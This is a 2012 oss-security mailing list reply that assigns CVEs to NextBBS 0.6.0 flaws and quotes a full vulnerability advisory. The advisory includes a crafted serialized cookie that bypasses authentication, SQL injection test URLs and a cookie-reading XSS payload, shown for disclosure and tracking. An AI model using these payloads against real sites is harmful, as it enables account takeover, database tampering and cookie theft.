Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Thu, 29 Mar 2012 19:34:57 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Henri Salo <henri@...v.fi>, come2waraxe@...oo.com
Subject: Re: CVE-request: NextBBS 0.6.0 waraxe-2012-SA#080

On 03/28/2012 11:34 PM, Henri Salo wrote:
> Can I get three 2012 CVEs for NextBBS issues in 0.6.0, thanks.
> 
> 1. user.php Cookie Parsing Authentication Bypass http://osvdb.org/show/osvdb/80626

Please use CVE-2012-1602 for this issue.

> 2. ajaxserver.php Multiple Function SQL Injection http://osvdb.org/show/osvdb/80637 (findUsers/isIdAvailable/getGreetings)

Please use CVE-2012-1603 for these SQL injection issues.

> 3. index.php do Parameter XSS http://osvdb.org/show/osvdb/80627

Please use CVE-2012-1604 for this issue.

This makes me sooo happy =) Not just a perfect CVE request but the
split/merge of the CVE's is also correct (e.g. 3 SQL injeciton vulns in
the same bit of code generally = merge =).

> http://packetstormsecurity.org/files/111250/NextBBS-0.6.0-Authentication-Bypass-SQL-Injection-XSS.html
> http://www.waraxe.us/advisory-80.html
> 
> Quoting the advisory http://seclists.org/bugtraq/2012/Mar/134
> """
> [waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
> ===============================================================================
> 
> Author: Janek Vind "waraxe"
> Date: 27. March 2012
> Location: Estonia, Tartu
> Web: http://www.waraxe.us/advisory-80.html
> 
> 
> Description of vulnerable software:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> nextBBS lets you create your own Community with unrivaled ease of use.
> Even though the software is highly performant, it doesn't lack any feature
> that makes big boards attractive. In fact, it offers the most "Web 2.0"
> experience currently available. 
> 
> http://sourceforge.net/projects/forums/
> 
> Vulnerable versions
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> Affected is NextBBS version 0.6.0, older versions may be vulnerable
> as well.
> 
> ###############################################################################
> 1. Authentication Bypass in "user.php"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data
> Attack vector: user submitted cookie
> Preconditions: none
> Result: attacker can impersonate any user, including admins
> 
> Source code snippet from vulnerable script "user.php":
> -----------------[ source code start ]---------------------------------
> // Cookie?
> if(isset($_COOKIE[$CONFIG->sessions->name]) || isset($_SESSION[$CONFIG->sessions->name]))
> {
> ..
>         if(isset($_COOKIE[$CONFIG->sessions->name]))
>         {
>                 $scookie = $_COOKIE[$CONFIG->sessions->name];
> ..
>                 $cookie = unserialize(stripslashes($scookie));
> ..
>                 $checkagainst = $this->generatePrivateKey($row['password']);
>                 if($checkagainst == $cookie['userkey'])
>                 {
>                         $_SESSION['ID'] = $uid;
>                         $this->setMember($_SESSION['ID']);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted cookie will be unserialized and resulting
> data is used for authentication. No input data validation exists.
> Attacker can use specially crafted cookie, so that after unserializing
> variable "$cookie['userkey']" will be boolean "true".
> Comparing as "if($checkagainst == $cookie['userkey'])" is insecure and will
> always return "true", if "$cookie['userkey']" is boolean "true".
> This will allow complete authentication bypass.
> 
> Test:
> 
> Array after serialization:
> a:3:{s:3:"uid";s:4:"1219";s:7:"checker";s:1:"1";s:7:"userkey";b:1;}
> After urlencoding:
> a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D
> Cookie:
> nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D;
> 
> 
> Now we will use Firefox with "Tamper Data" extension for easy cookie manipulation.
> Let's open page in unauthenticated state and with crafted cookie:
> 
> http://localhost/nextbbs.0.6.0/
> 
> Result: "Welcome back, waraxe. (Log out?) (Admin CP)"
> 
> We have admin level access now, as expected.
> 
> ###############################################################################
> 2. SQL Injection in "ajaxserver.php" function "findUsers"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "curstr"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function findUsers($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $filter = urldecode($INPUT['curstr']);
>         $retstr = '';
>         $qry = "SELECT userid FROM {$CONFIG->dbprfx}users 
>                 WHERE server='{$CONFIG->server}' AND userid like '".$filter."%'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "curstr" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe%'' at line 1
> Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%']
> 
> 
> ###############################################################################
> 3. SQL Injection in "ajaxserver.php" function "isIdAvailable"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "id"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function isIdAvailable($method)
> {
>         global $INPUT, $CONFIG, $DB;
> 
>         $filter = urldecode($INPUT['id']);
>         $qry = "SELECT COUNT(*) as c FROM {$CONFIG->dbprfx}users
>                 WHERE server='{$CONFIG->server}' AND userid ='".$filter."'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "id" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe'' at line 1
> Query [SELECT COUNT(*) as c FROM bb_users WHERE server='1' AND userid ='war'axe']
> 
> 
> ###############################################################################
> 4. SQL Injection in "ajaxserver.php" function "getGreetings"
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in SQL queries
> Attack vector: user submitted GET parameter "username"
> Preconditions: none
> Result: attacker can manipulate database queries
> 
> Source code snippet from vulnerable script "ajaxserver.php":
> -----------------[ source code start ]---------------------------------
> function getGreetings($method)
> {
>         global $INPUT, $CONFIG, $DB;
>         
>         $username = urldecode($INPUT['username']);
>         $qry = "SELECT text FROM {$CONFIG->dbprfx}greetings g JOIN
>                 {$CONFIG->dbprfx}users u ON (g.dest_id=u.user_ID)
>                 WHERE g.server='{$CONFIG->server}' AND 
>                 u.userid='{$username}' AND g.folder_id='1'";
>         $res = $DB->query($qry);
> -----------------[ source code end ]-----------------------------------
> 
> As seen above, user submitted GET parameter "username" is urldecoded and
> afterwards used in SQL query without proper sanitization. By using urlencoded
> single quotes it is possible to conduct SQL injection atttacks. 
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe
> 
> Result:
> 
> SQL Layer Error: You have an error in your SQL syntax; check the manual
> that corresponds to your MySQL server version for the right syntax to use
> near 'axe' AND g.folder_id='1'' at line 1
> Query [SELECT text FROM bb_greetings g JOIN bb_users u ON (g.dest_id=u.user_ID)
>  WHERE g.server='1' AND u.userid='war'axe' AND g.folder_id='1']
> 
> 
> ###############################################################################
> 5. Reflected XSS in anti-hack measures
> ###############################################################################
> 
> Reason: using unsanitized user submitted data in outputted html
> Attack vector: user submitted URI
> Remarks: XSS payload max length is limited
> 
> Test:
> 
> http://localhost/nextbbs.0.6.0/index.php?do=<body+onload=alert(document.cookie);>
> 
> Response page shows warning:
> 
> "Note: A hack attempt was detected.
> It is being logged and reported to the admin along with your IP address:"
> 
> At the same time XSS payload execution can be observed.
> 
> 
> Contact:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> come2waraxe () yahoo com
> Janek Vind "waraxe"
> """
> 
> - Henri Salo


-- 
Kurt Seifried Red Hat Security Response Team (SRT)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.